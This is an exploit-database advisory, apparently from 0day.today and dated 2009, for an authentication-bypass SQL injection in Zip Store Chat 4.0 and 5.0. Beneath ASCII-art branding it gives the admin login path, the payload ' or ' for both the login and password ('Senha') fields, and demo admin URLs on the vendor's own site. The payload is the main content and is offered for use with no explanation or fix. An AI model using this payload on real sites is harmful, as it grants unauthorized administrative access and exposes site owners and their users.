id: 5355
date: 06/11/2009
title: Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability
author: ByALBAYX
cves: 

================================================================
Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection Vulnerability
================================================================



        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------
@~~=Author   : ByALBAYX
---------------Ooooo-------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)
@~~=======================================~~@
@~~=Script   : Zip Store Chat 4.0 + 5.0

@~~=S.Site   : http://zipstore.com.br
@~~=======================================~~@

@~~=Vul

@~~=http://c4team.org/ [Yol] /admin/index.asp

Login: ' or '

Senha: ' or '

@~~=Demo    : 

@~~=http://zipstore.com.br/chat/4.0/admin/index.asp

@~~=http://zipstore.com.br/chat/5.0/admin/index.asp
@~~=======================================~~@

@~~=:/



#  0day.today [2023-03-22]  #